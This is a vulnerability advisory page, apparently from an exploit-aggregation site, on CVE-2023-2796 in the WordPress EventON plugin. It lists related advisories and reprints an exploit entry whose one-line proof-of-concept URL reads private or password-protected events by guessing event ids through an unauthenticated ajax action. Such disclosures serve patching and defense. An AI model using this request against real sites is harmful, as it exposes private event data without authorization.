WordPress EventON Calendar 4.4 Insecure Direct Object Reference

🗓️ 04 Aug 2023 00:00:00Reported by Miguel SantarenoType

packetstorm🔗 packetstormsecurity.com👁 299 Views

Wordpress EventON Calendar 4.4 Insecure Direct Object Reference - Unauthenticated Event Acces

Reporter	Title	Published	Views	Family All 17
0day.today	Wordpress EventON Calendar 4.4 Plugin - Unauthenticated Event Access Vulnerability	4 Aug 202300:00	–	zdt
Circl	CVE-2023-2796	10 Jul 202320:24	–	circl
CNNVD	WordPress plugin EventON 安全漏洞	10 Jul 202300:00	–	cnnvd
CVE	CVE-2023-2796	10 Jul 202312:40	–	cve
Cvelist	CVE-2023-2796 EventON < 2.1.2 - Unauthenticated Event Access	10 Jul 202312:40	–	cvelist
Exploit DB	Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access	4 Aug 202300:00	–	exploitdb
Nuclei	EventON <= 2.1 - Missing Authorization	5 Jun 202603:02	–	nuclei
NVD	CVE-2023-2796	10 Jul 202316:15	–	nvd
Patchstack	WordPress EventON Plugin < 2.1.2 is vulnerable to Broken Access Control	22 Jun 202300:00	–	patchstack
Prion	Authorization	10 Jul 202316:15	–	prion

`# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access  
# Date: 03.08.2023  
# Exploit Author: Miguel Santareno  
# Vendor Homepage: https://www.myeventon.com/  
# Version: 4.4  
# Tested on: Google and Firefox latest version  
# CVE : CVE-2023-2796  
  
# 1. Description  
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.  
  
  
# 2. Proof of Concept (PoC)  
Proof of Concept:  
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value  
  
`

04 Aug 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.15.3

EPSS0.71545

SSVC